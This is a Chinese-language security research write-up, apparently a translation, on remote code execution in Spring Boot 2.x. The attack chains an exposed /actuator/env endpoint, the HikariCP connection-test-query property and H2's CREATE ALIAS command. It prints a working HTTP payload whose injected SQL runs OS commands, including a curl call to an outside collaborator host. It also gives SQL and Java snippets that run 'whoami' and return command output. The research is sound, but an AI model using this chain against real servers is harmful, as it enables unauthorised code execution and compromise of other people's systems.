Spring Boot 2.x RCE

通过三步执行远程代码执行：在Spring Boot 2中链接暴露的执行器和H2数据库别名

序幕

Spring Boot框架是最流行的基于Java的微服务框架之一，可帮助开发人员快速轻松地部署Java应用程序。通过专注于开发人员友好的工具和配置，Spring Boot加快了开发过程。

但是，这些开发默认设置在经验不足的开发人员手中可能会变得很危险。我的文章扩展了Michal Stepankin的工作，Michal Stepankin研究了在Spring Boot 1.x中利用暴露的执行器并通过反序列化实现RCE的方法。我通过Spring Boot 2.x的默认HikariCP数据库连接池和公共Java开发数据库H2数据库引擎提供了更新的RCE方法。我还基于Spring Boot的默认教程应用程序创建了一个示例Spring Boot应用程序，以演示该漏洞利用。

让我们从最终的有效负载开始：

POST /actuator/env HTTP/1.1

{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream());  if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('curl  http://x.burpcollaborator.net');"}

有效负载包括三个不同部分：对/actuator/env端点的环境修改请求，CREATE ALIASH2 SQL命令，当然还有最终的OS命令注入。

第一幕：暴露的执行器

S

pring Boot Actuators创建了多个HTTP端点，使开发人员可以轻松地监视和管理应用程序。正如Stepankin所指出的，Starting with Spring version 1.5, all endpoints apart from '/health' and '/info' are considered sensitive and secured by default, but this security is often disabled by the application developers.对于此攻击，/actuator/env必须公开端点。开发人员只需要向其配置文件中添加management.endpoints.web.exposure.include=env（或更糟糕的是management.endpoints.web.exposure.include=*）application.properties即可公开这一点。

该/actuator/env端点包括GET和POST方法来检索和设置应用程序的环境变量。该POST请求使用以下格式：

POST /actuator/env HTTP/1.1

{"name":"<NAME OF VARIABLE>","value":"<VALUE OF VARIABLE>"}

您可以浏览应用程序的环境变量列表，这些环境变量提供有关执行上下文和系统的数据。但是，这些变量中只有很少的一个可以在运行时用于更改应用程序，甚至可以使用更少的变量来执行代码。幸运的是，Spring Boot 2.x 默认使用HikariCP数据库连接池，它引入了一个这样的变量。

第二幕：H2 CREATE ALIAS命令

HikariCP帮助应用程序与数据库进行通信。根据其文档，它接受connectionTestQuery定义the query that will be executed just before a connection is given to you from the pool to validate that the connection to the database is still alive.匹配的Spring Boot环境变量为的配置spring.datasource.hikari.connection-test-query。简而言之，无论何时创建新的数据库连接，值都spring.datasource.hikari.connection-test-query将首先作为SQL查询执行。触发新数据库连接的方式有两种：通过向请求重新启动应用程序POST /actuator/restart或更改数据库连接数，以及通过向应用程序发出多个请求来初始化它。

这已经很严重了–您可以运行任意SQL查询并根据需要删除数据库。但是，让我们进一步升级并研究H2数据库引擎，它是最流行的Java开发数据库之一。可以将其视为基于Java的SQLite，但非常易于集成到Spring Boot中。它只需要一个依赖项。因此，它通常在Spring Boot开发中使用。

Matheus Bernardes强调了H2中包含的重要SQL命令：CREATE ALIAS。与PostgreSQL的用户定义函数类似，您可以定义与别名相对应的Java函数，然后像在函数中一样在SQL查询中调用它。

CREATE ALIAS GET_SYSTEM_PROPERTY FOR "java.lang.System.getProperty";
CALL GET_SYSTEM_PROPERTY('java.class.path');

当然，您可以使用Java的Runtime.getRuntime().exec功能，该功能允许您直接执行OS命令。

CREATE ALIAS EXEC AS CONCAT('void e(String cmd) throws java.io.IOException',
HEXTORAW('007b'),'java.lang.Runtime rt= java.lang.Runtime.getRuntime();
rt.exec(cmd);',HEXTORAW('007d'));
CALL EXEC('whoami');

String shellexec(String cmd) throws java.io.IOException {
 java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream());
 if (s.hasNext()) {
  return s.next();  // OS command returns output; return output and SQL query succeeds
 }
 throw new IllegalArgumentException(); // OS command fails to return output; throw exception and SQL query fails
}